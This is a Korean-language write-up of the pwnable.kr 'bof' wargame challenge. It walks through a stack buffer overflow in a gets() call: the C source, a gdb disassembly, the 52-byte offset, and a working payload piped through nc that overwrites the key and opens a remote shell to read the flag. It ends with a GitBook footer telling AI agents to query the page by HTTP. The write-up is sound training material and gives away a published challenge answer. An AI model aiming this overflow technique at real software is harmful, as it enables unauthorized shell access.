# bof - 5 pt

{% hint style="info" %}
Nana told me that buffer overflow is one of the most common software vulnerability. Is that true?

Download : <http://pwnable.kr/bin/bof>\
Download : <http://pwnable.kr/bin/bof.c>

Running at : nc pwnable.kr 9000
{% endhint %}

bof.c 파일 내용은 아래와 같다.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}
```

bof 파일의 `func()` 를 gdb로 분석하면 아래와 같다.

```bash
(gdb) disas func
Dump of assembler code for function func:
   0x0000062c <+0>:     push   %ebp
   0x0000062d <+1>:     mov    %esp,%ebp
   0x0000062f <+3>:     sub    $0x48,%esp
   0x00000632 <+6>:     mov    %gs:0x14,%eax
   0x00000638 <+12>:    mov    %eax,-0xc(%ebp)
   0x0000063b <+15>:    xor    %eax,%eax
   0x0000063d <+17>:    movl   $0x78c,(%esp)
   0x00000644 <+24>:    call   0x645 <func+25>
   0x00000649 <+29>:    lea    -0x2c(%ebp),%eax
   0x0000064c <+32>:    mov    %eax,(%esp)
   0x0000064f <+35>:    call   0x650 <func+36>
   0x00000654 <+40>:    cmpl   $0xcafebabe,0x8(%ebp)
   0x0000065b <+47>:    jne    0x66b <func+63>
   0x0000065d <+49>:    movl   $0x79b,(%esp)
   0x00000664 <+56>:    call   0x665 <func+57>
   0x00000669 <+61>:    jmp    0x677 <func+75>
   0x0000066b <+63>:    movl   $0x7a3,(%esp)
   0x00000672 <+70>:    call   0x673 <func+71>
   0x00000677 <+75>:    mov    -0xc(%ebp),%eax
   0x0000067a <+78>:    xor    %gs:0x14,%eax
   0x00000681 <+85>:    je     0x688 <func+92>
   0x00000683 <+87>:    call   0x684 <func+88>
   0x00000688 <+92>:    leave
   0x00000689 <+93>:    ret
End of assembler dump.
```

4개의 `call` 이 있는데, 각각 `printf()` , `gets()` , `system()`, `printf()` 라고 추측하였다.

이를 통해 `overflowme` 와 `key` 의 위치를 알 수 있다.

아래 코드를 통해 `overflowme` 가 `ebp - 0x2c` 에 위치함을 알 수 있다.

```bash
   0x00000649 <+29>:    lea    -0x2c(%ebp),%eax
   0x0000064c <+32>:    mov    %eax,(%esp)
   0x0000064f <+35>:    call   0x650 <func+36>
```

아래 코드를 통해 `key` 가 `ebp + 0x08` 에 위치함을 알 수 있다.

```bash
   0x00000654 <+40>:    cmpl   $0xcafebabe,0x8(%ebp)
   0x0000065b <+47>:    jne    0x66b <func+63>
   0x0000065d <+49>:    movl   $0x79b,(%esp)
   0x00000664 <+56>:    call   0x665 <func+57>
```

0x08은 dec으로 8이고, 0x2c는 dec으로 44이므로 52byte의 패딩으로 overflow가 가능하다.

```bash
~
❯ (python -c 'print("A" * 52 + "\xbe\xba\xfe\xca")';cat) | nc pwnable.kr 9000
ls
bof
bof.c
flag
log
log2
super.pl
cat flag
daddy, I just pwned a buFFer :)
```

{% hint style="success" %}
Flag? : daddy, I just pwned a buFFer :)
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://donghyunlee.gitbook.io/write-up/wargame/pwnable.kr/toddlers-bottle/bof-5-pt.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.